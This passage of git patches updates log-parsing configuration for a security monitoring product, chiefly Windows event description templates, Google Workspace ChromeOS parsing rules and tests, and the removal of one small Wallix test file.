"field": "winlog.provider_guid", "value": "{00000000-0000-0000-0000-000000000000}" - }, - { - "field": "winlog.computer_name" } ] }, @@ -1231,12 +1192,6 @@ { "field": "winlog.provider_guid", "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" - }, - { - "field": "event.action" - }, - { - "field": "winlog.computer_name" } ] }, @@ -1246,12 +1201,6 @@ { "field": "event.module", "value": "powershell" - }, - { - "field": "event.action" - }, - { - "field": "winlog.computer_name" } ] }, From 60cfdc0bd0210d65b78ff4ef5cdbb8b25c7dcfc7 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 17:58:27 +0100 Subject: [PATCH 21/84] Fixing details in smart description to avoid NULL --- .../winlogbeat/_meta/smart-descriptions.json | 426 ++++++++++++++++++ 1 file changed, 426 insertions(+) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index a3b786729..ee074adf6 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -668,6 +668,158 @@ } ] }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field":"host.hostname" + } + ] + }, + { + "value": "{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} from {source.ip}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "source.ip" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + }, + { + "source": "user.name", + "target": "source.ip", + "type": "reconnected from" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field":"host.hostname" + } + ] + }, + { + "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.SessionName", + "type": "reconnected on session" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4778 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, { "value": "{user.domain}\\{user.name} reconnected on session {action.properties.SessionName} on {host.hostname} from {source.ip}", "relationships": [ @@ -693,6 +845,9 @@ }, { "field": "source.ip" + }, + { + "field":"host.hostname" } ] }, @@ -776,6 +931,26 @@ } ] }, + { + "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName}", + "relationships": [ + { + "source": "user.name", + "target": "action.properties.TargetUserName", + "type": "assigned a new logon to special group" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4964 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Security-Auditing" + } + ] + }, { "value": "{user.domain}\\{user.name} assigned a new logon to special group {action.properties.TargetDomainName}\\{action.properties.TargetUserName} on {host.hostname}", "relationships": [ @@ -793,6 +968,9 @@ { "field": "event.provider", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "host.hostname" } ] }, @@ -969,6 +1147,191 @@ } ] }, + { + "value": "Process {process.executable} created by {user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created on {host.name}", + "relationships": [ + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "event.provider", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "host.name" + } + ] + }, { "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", "relationships": [ @@ -1011,6 +1374,18 @@ { "field": "event.provider", "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" } ] }, @@ -1148,6 +1523,57 @@ }, { "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress} to {winlog.event_data.DestAddress}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + }, + { + "field": "event.action", + "value": "Filtering Platform Connection" + }, + { + "field": "winlog.event_data.SourceAddress" + }, + { + "field": "winlog.event_data.DestAddress" + } + ] + }, + { + "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + }, + { + "field": "event.action", + "value": "Filtering Platform Connection" + }, + { + "field": "winlog.event_data.SourceAddress" + } + ] + }, + { + "value": "Filtering connection on {winlog.computer_name} to {winlog.event_data.DestAddress}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + }, + { + "field": "event.action", + "value": "Filtering Platform Connection" + }, + { + "field": "winlog.event_data.DestAddress" + } + ] + }, + { + "value": "Filtering connection on {winlog.computer_name}", "conditions": [ { "field": "winlog.provider_guid", From 1e1d1a72d4c376dd3741994d319e44d0a33c2795 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 18:03:25 +0100 Subject: [PATCH 22/84] small fix --- Beats/winlogbeat/_meta/smart-descriptions.json | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index ee074adf6..b3a3257b7 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -16,6 +16,9 @@ { "field": "event.provider", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.LogonType" } ] }, @@ -42,6 +45,9 @@ "field": "event.provider", "value": "Microsoft-Windows-Security-Auditing" }, + { + "field": "action.properties.LogonType" + }, { "field": "source.ip" } From 5a3e4861db9637ed8dcc5b49ebbcf8cfce42586b Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 18:10:35 +0100 Subject: [PATCH 23/84] change from event.provider to winlog.provider_name --- .../winlogbeat/_meta/smart-descriptions.json | 130 +++++++++--------- 1 file changed, 65 insertions(+), 65 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index b3a3257b7..b720b4ffb 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -14,7 +14,7 @@ "value": 4624 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -42,7 +42,7 @@ "value": 4624 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -68,7 +68,7 @@ "value": 4625 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -88,7 +88,7 @@ "value": 4625 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -113,7 +113,7 @@ "value": 4625 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -136,7 +136,7 @@ "value": 4634 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -156,7 +156,7 @@ "value": 4648 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -176,7 +176,7 @@ "value": 4648 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -200,7 +200,7 @@ "value": 4662 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -220,7 +220,7 @@ "value": 4672 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -240,7 +240,7 @@ "value": 4672 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -285,7 +285,7 @@ "value": 4688 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -305,7 +305,7 @@ "value": 4689 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -325,7 +325,7 @@ "value": 4720 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -345,7 +345,7 @@ "value": 4722 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -365,7 +365,7 @@ "value": 4723 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -389,7 +389,7 @@ "value": 4723 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -413,7 +413,7 @@ "value": 4725 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -433,7 +433,7 @@ "value": 4726 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -453,7 +453,7 @@ "value": 4727 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -473,7 +473,7 @@ "value": 4742 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -493,7 +493,7 @@ "value": 4744 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -513,7 +513,7 @@ "value": 4750 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -533,7 +533,7 @@ "value": 4768 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -553,7 +553,7 @@ "value": 4768 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -577,7 +577,7 @@ "value": 4769 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -597,7 +597,7 @@ "value": 4769 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -621,7 +621,7 @@ "value": 4771 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -641,7 +641,7 @@ "value": 4776 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -665,7 +665,7 @@ "value": 4776 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -694,7 +694,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -722,7 +722,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -745,7 +745,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -770,7 +770,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -798,7 +798,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -821,7 +821,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -846,7 +846,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -872,7 +872,7 @@ "value": 4778 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -892,7 +892,7 @@ "value": 4798 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -912,7 +912,7 @@ "value": 4799 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -932,7 +932,7 @@ "value": 4825 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -952,7 +952,7 @@ "value": 4964 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -972,7 +972,7 @@ "value": 4964 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -995,7 +995,7 @@ "value": 5140 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -1015,7 +1015,7 @@ "value": 5140 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -1039,7 +1039,7 @@ "value": 5145 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -1059,7 +1059,7 @@ "value": 5145 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" }, { @@ -1083,7 +1083,7 @@ "value": 5156 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" } ] @@ -1096,7 +1096,7 @@ "value": 4103 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1109,7 +1109,7 @@ "value": 4104 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1122,7 +1122,7 @@ "value": 4104 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1135,7 +1135,7 @@ "value": 4105 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1148,7 +1148,7 @@ "value": 4106 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-PowerShell" } ] @@ -1183,7 +1183,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1224,7 +1224,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1278,7 +1278,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1327,7 +1327,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1378,7 +1378,7 @@ "value": 1 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" }, { @@ -1415,7 +1415,7 @@ "value": 2 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1435,7 +1435,7 @@ "value": 3 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1448,7 +1448,7 @@ "value": 11 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1465,7 +1465,7 @@ "value": "CreateValue" }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1478,7 +1478,7 @@ "value": 13 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1491,7 +1491,7 @@ "value": 16 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] @@ -1504,7 +1504,7 @@ "value": 22 }, { - "field": "event.provider", + "field": "winlog.provider_name", "value": "Microsoft-Windows-Sysmon" } ] From b1252eaca9c4f4450874f6f8943795476e8ed8e3 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:36:26 +0100 Subject: [PATCH 24/84] apply linter --- Google Cloud/google-report/_meta/fields.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 0e522bee5..ded77dffa 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -56,6 +56,7 @@ google.report.rule.severity: google.report.rule.type: description: Rule type name: google.report.rule.type + google.report.saml.application_name: description: Saml SP application name name: google.report.saml.application_name From 19a65a4d5e293e1d2fdbfa64529dc10caee206c9 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:40:52 +0100 Subject: [PATCH 25/84] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 4cf8bb8e7..9e00ad24a 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -215,6 +215,10 @@ }, { "field": "google.report.rule.type" + } + ] + }, + { "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", "conditions": [ { From 9ff46d902883e220abb1678fe65f6151d46ab06c Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 11:44:32 +0100 Subject: [PATCH 26/84] Fix fields --- Google Cloud/google-report/_meta/fields.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index ded77dffa..21d6f4ee1 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -56,6 +56,7 @@ google.report.rule.severity: google.report.rule.type: description: Rule type name: google.report.rule.type + type: keyword google.report.saml.application_name: description: Saml SP application name From c99c1228b8eba92184a6a6ca972ffea8034cd286 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Fri, 15 Nov 2024 12:03:00 +0100 Subject: [PATCH 27/84] test(Wallix): remove useless test --- Wallix/wallix-bastion/tests/rexec.json | 12 ------------ 1 file changed, 12 deletions(-) delete mode 100644 Wallix/wallix-bastion/tests/rexec.json diff --git a/Wallix/wallix-bastion/tests/rexec.json b/Wallix/wallix-bastion/tests/rexec.json deleted file mode 100644 index 14e87bd1a..000000000 --- a/Wallix/wallix-bastion/tests/rexec.json +++ /dev/null @@ -1,12 +0,0 @@ -{ - "input": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation" - }, - "expected": { - "message": "rexec line 15: Deprecated option UsePrivilegeSeparation", - "event": { - "provider": "sshd" - }, - "wallix": {} - } -} \ No newline at end of file From 3c5145e8f49c9fd9c07d4f2af1d4cf491bdbbc35 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:25:48 +0100 Subject: [PATCH 28/84] Add chrome service --- .../_meta/smart-descriptions.json | 57 +++++++++++++++++++ Google Cloud/google-report/ingest/parser.yml | 20 +++++++ .../tests/test_chrome_sample_1.json | 47 +++++++++++++++ .../tests/test_chrome_sample_2.json | 45 +++++++++++++++ 4 files changed, 169 insertions(+) create mode 100644 Google Cloud/google-report/tests/test_chrome_sample_1.json create mode 100644 Google Cloud/google-report/tests/test_chrome_sample_2.json diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6fa8c709a..0ac5acfe5 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -282,6 +282,63 @@ } ] }, + { + "value": "Device {device.model.name} with ID {device.id} is {event.action} in the {network.application} application", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROMEOS_PERIPHERAL_STATUS_UPDATED" + }, + { + "field": "device.model.name" + }, + { + "field": "device.id" + } + ] + }, + { + "value": "The user on device model {device.model.name} logged out due to {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGOUT_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + } + ] + }, + { + "value": "The user on device model {device.model.name} log in due to {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 3a0fce88f..c92e4bf32 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -30,6 +30,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "vault"}}' - name: set_saml_fields filter: '{{ json_event.message.id.applicationName == "saml"}}' + - name: set_chrome_fields + filter: '{{ json_event.message.id.applicationName == "chrome"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -278,3 +280,21 @@ stages: event.type: ["denied"] event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' filter: '{{ json_event.message.events[0].name == "login_failure"}}' + + set_chrome_fields: + actions: + - set: + event.category: ["web"] + organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}' + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' + device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["change"] + filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}' + + - set: + event.type: ["connection"] + filter: '{{ json_event.message.events[0].name in ["CHROME_OS_LOGOUT_EVENT", "CHROME_OS_LOGIN_EVENT"]}}' diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json new file mode 100644 index 000000000..36c42d3d5 --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json @@ -0,0 +1,47 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "event": { + "action": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": 